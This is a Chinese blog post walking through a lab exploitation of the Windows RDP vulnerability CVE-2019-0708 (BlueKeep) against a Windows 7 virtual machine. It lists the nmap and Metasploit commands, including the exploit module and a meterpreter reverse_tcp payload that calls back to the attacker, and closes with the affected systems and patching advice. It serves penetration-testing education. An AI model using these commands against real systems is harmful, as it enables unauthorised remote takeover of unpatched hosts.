利用windows 7 cve-2019-0708漏洞

最新推荐文章于 2024-12-09 15:30:05 发布
最新推荐文章于 2024-12-09 15:30:05 发布
阅读量1.5k 收藏 23
点赞数 26
文章标签: windows 服务器 linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44789393/article/details/135137936
版权
本文详细描述了如何在Windows7环境中利用CVE-2019-0708漏洞进行远程桌面服务攻击,包括环境配置、工具使用(如Metasploit和nmap)以及漏洞利用步骤。强调了该漏洞的严重性和可能的恶意软件传播风险,提醒读者及时修补安全漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

目录

一、环境准备

二、利用win 7 cve-2019-0708漏洞

三、总结

一、环境准备

Windows系列服务器于2019年5月15号,被爆出高危漏洞,该漏洞存在于Windows系统的Remote Desktop Services(远程桌面服务)(端口3389)中,未经身份验证的攻击者可以通过发送特殊构造的数据包触发漏洞,可能导致远程无需用户验证控制系统。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。

说明:
    这意味着该漏洞可以通过网络蠕虫的方式被利用,利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机

1.开启Kali虚拟机和win7靶机

2.在win7虚拟机的命令窗口输入:netstat -an,查看打开的端口:

3.若3389没打开,可以右键计算机,选择属性

4.选择远程设置

5.选择允许远程连接

二、利用win 7 cve-2019-0708漏洞

本次漏洞利用使用kali自带的nmap扫描工具和metasploit渗透工具。

        Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。

        nmap是用来探测计算机网络上的主机和服务的一种安全扫描器。为了绘制网络拓扑图,Nmap的发送特制的数据包到目标主机,然后对返回数据包进行分析。Nmap是一款枚举和测试网络的强大工具。

1.在kali中使用nmap扫描目标机器端口确认是否开启3389端口:

nmap -sV 192.168.100.106

2.确认开启后启动msfconsole

msfconsole

3. 搜索漏洞:

search 0708

前两个模块,一个是扫描功能,一个是攻击功能。

4.使用攻击功能,也就是第二个模块:

use exploit/windows/rdp/cve_2019_0708_bluekeep_rce

5.设置目标:

set rhost 192.168.100.106     #设置win7ip

set rport 3389   

6.设置payload:

set payload windows/x64/meterpreter/reverse_tcp   #设置64位的payload如果是32位机器则不用加x64

7.设置攻击机:

set lhost 攻击者ip    #设置kali的ip 

set lport 4444        #设置攻击者的监听端口(端口可以随意更改)

8.输入:show targets,显示可以选择的靶机的架构

9.用于vm是15.5.1,所以可以选择target 3-5

10.选择target 3,进行尝试:

set target 3

11.进行攻击,运行:run

这时我们发现win7已经蓝屏了

我们可以尝试其他target

我这里尝试了很多次都没能成功建立连接

12.假如可以建立连接,输入:

run post/windows/manage/enable_rdp

 运行远程桌面模块

13.另开一个kali终端,输入:

rdesktop 192.168.100.103

如果漏洞利用成功的话是不需要用户名和密码就可以直接进入win7

三、总结

2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的,堪比WannaCry。它影响了某些旧版本的Windows系统,包括:

  • Windows 7 for 32-bit Systems Service Pack 1
  • Windows 7 for x64-based Systems Service Pack 1
  • Windows Server 2008 for 32-bit Systems Service Pack 2
  • Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 for Itanium-Based Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2
  • Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
  • Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1
  • Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
  • Windows XP SP3 x86
  • Windows XP Professional x64 Edition SP2
  • Windows XP Embedded SP3 x86
  • Windows Server 2003 SP2 x86
  • Windows Server 2003 x64 Edition SP2
  • Windows 8和Windows 10及之后版本的用户不受此漏洞影响

cve-2019-0708漏洞修复

2019年09月07日,黑客大佬Rapid7在Github公开发布了CVE-2019-0708(Windows远程桌面服务漏洞)的EXP,基于该模块的漏洞利用工具开始扩散,已经构成了蠕虫级的攻击威胁。

据360Center分析,该漏洞是预身份验证且无需用户交互,这意味着这个漏洞可以通过网络蠕虫的方式被利用。利用此漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。成功利用此漏洞的攻击者可以在目标系统完成安装应用程序,查看、更改或删除数据,创建完全访问权限的新账户等操作。

CVE-2019-0708已公开的漏洞利用工具可以极易的被普通攻击者使用,脚本化/批量化/自动化攻击将接踵而至。经研判,360CERT确认漏洞等级严重,影响面广,建议相关单位、企业内部立即进行安全排查,给在漏洞影响范围内的服务器、主机及时更新安全补丁。

小蝈蝈丶
关注
kali CVE-2019-0708漏洞利用
chidaoqiannianzq的博客
11-26 598
本次学习实验采用kali作为攻击方,使用一台windows 7虚拟机作为受害者,首先保证两台虚拟机在一个网段当中,确保两台机器可以互通。windows主机开启3389端口远程服务。CVE-2019-0708,也被称为“BlueKeep”,是一个严重的远程桌面服务(RDS)漏洞,存在于多个旧版本的Windows操作系统中。我们以此填写受害者IP,端口和payload 负载。kali进入msfconsole渗透测试框架。查看攻击目标信息想要使用的攻击架构。利用kali扫描目标主机。确保3389端口开启。
CVE-2019-0708漏洞复现(远程桌面服务)
最新发布
m0_74795359的博客
04-26 470
CVE-2019-0708Windows远程桌面服务(RDP)的远程代码执行漏洞,影响未打补丁的Windows系统。攻击者无需用户交互即可发送恶意RDP请求,触发堆溢出,最终执行任意代码。该漏洞被命名为"BlueKeep",因其潜在危害被评级为(CVSS 9.8)。
CVE-2019-0708漏洞利用
彼岸花苏陌的博客
11-30 933
CVE-2019-0708漏洞利用 漏洞平台披露 https://nvd.nist.gov/vuln/detail/CVE-2019-0708 影响系统: windows_7 windows2003 windows2008 windowsxp 等等,具体影响范围看上面的链接网址即可 漏洞利用: 攻击方:192.168.216.136(kali linux) 靶机:192.168.216.138(windows7) 1.使用nmap进行主机探测 使用nmap进行扫描(这里使用zennmap了,不过也无伤大雅
漏洞复现】CVE 2019-0708 漏洞利用
TeamsSix 的 优快云 空间
06-15 2888
0x00 前言 2019年5月14日微软官方发布安全补丁,修复了Windows远程桌面服务的远程代码执行漏洞,该漏洞影响了某些旧版本的Windows系统。此漏洞是预身份验证且无需用户交互,这就意味着这个漏洞可以通过网络蠕虫的方式被利用利用漏洞的任何恶意软件都可能从被感染的计算机传播到其他易受攻击的计算机,其方式与2017年WannaCry恶意软件的传播方式类似。 以上内容来自360网络安全...
CVE 2019-0708 漏洞利用
qq_33391644的博客
09-02 619
首先确认kali是否已安装POC 没安装的操作步骤 一、首先git clone代码 git clone https://github.com/n1xbyte/CVE-2019-0708.git 二、进入CVE-2019-0708目录 cd CVE-2019-0708 三、安装需要的库 pip3 install impacket 四、执行POC攻击("192.168.1.106...
CVE-2019-0708漏洞 复现利用
nszmsjhshs的博客
03-09 1万+
这几天研究cve-2019-0708,一开始出错特别多而且只能把win7打成蓝屏,经过多次的更换靶机和攻击的试探最终功夫不负有心人,我利用cve-2020-0708终于拿到了win7的shell权限 演示步骤如下 靶机:win7旗舰版IP:192.168.220.151 攻击机:kali2021IP:192.168.220.148 靶机需要额外的内部环境配置,首先需要将靶机的防火墙关闭,其次将远程控制功能开启并允许所有机可以远程控制。然后将防火墙设置高级模式,在高级模式中的添加入站规则,设置新增端口3
中职网络安全2022国赛之CVE-2019-0708漏洞利用
Ba1_Ma0的博客
04-22 4008
简介 我做了一个简单的环境来复现这个漏洞,需要虚拟机环境的可以加我qq:3316735898,有什么不会的也可以问我 1.通过本地PC中渗透测试平台Kali对靶机场景Server1进行系统服务及版本扫描渗透测试,以xml格式向指定文件输出信息(使用工具Nmap),将以xml格式向指定文件输出信息必须要使用的参数作为Flag值提交 nmap将扫描内容输出到.xml文件的参数为 -oX // (XML 输出) 将输出直接写入 filespec 指定的 xml 文件,得到的 xml 文件可以由浏览器,或其
CVE-2019-0708漏洞利用脚本
01-10
自己下载到kali解压,参考文章https://blog.youkuaiyun.com/weixin_43742395/article/details/112432343
CVE-2019-0708检测与修复补丁CVE-2019-0708检测与修复补丁
06-05
CVE-2019-0708检测与修复补丁 下载链接
CVE-2019-0708 微软补丁更新
似水无痕
05-17 2万+
微软公司于美国当地时间2019年5月14日发布重要安全公告,其操作系统远程桌面(Remote Desktop Services),俗称的3389服务存在严重安全漏洞(编号CVE-2019-0708):攻击者在没有任何授权的情况下(不需要用户名和密码),可以远程直接攻击操作系统开放的3389服务,在受害主机上执行恶意攻击行为,包括安装后门,查看、篡改隐私数据,创建拥有完全用户权限的新账户,影响范围从...
CVE-2019-0708 RDP MSF漏洞利用
2401_88756905的博客
12-09 1200
CVE-2019-0708 RDP MSF漏洞复现使用 VMware 安装Windows7 X64 模拟受害机Windows7 X64下载链接:链接: https://pan.baidu.com/s/1A_b2PCbzInKx3hMkUz1xUg 提取码: fiwx1,metasploit-framework, kali msf 需更新到最新版本,如果正常打开输入:msfupdate 进行更新,如果启动msf报错,可以卸载重新安装:1msfinstall。
Win7 sp 1的ms17-010和CVE-2019-0708漏洞利用
qq_74378387的博客
11-01 1482
kaliwindows 7 sp 1:链接:https://pan.baidu.com/s/1AdimIwMPdg8Wf8FUeJbx2w?pwd=jfghwin7的登录账号和密码为root:root先让靶机与kali处于同一个网段。
CVE-2019-0708——RDP漏洞利用
热门推荐
迷风小白
07-03 6万+
背景介绍 Windows系列服务器2019年5月15号,被爆出高危漏洞,该漏洞影响范围较广,漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击的。这个漏洞是今年来说危害严重性最大的漏洞,跟之前的勒索,永恒之蓝病毒差不多。 影响系统:windows2003、windows2008、windows2008 R2、windows xp 、win7 环境: 攻击机:kali IP:192....
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值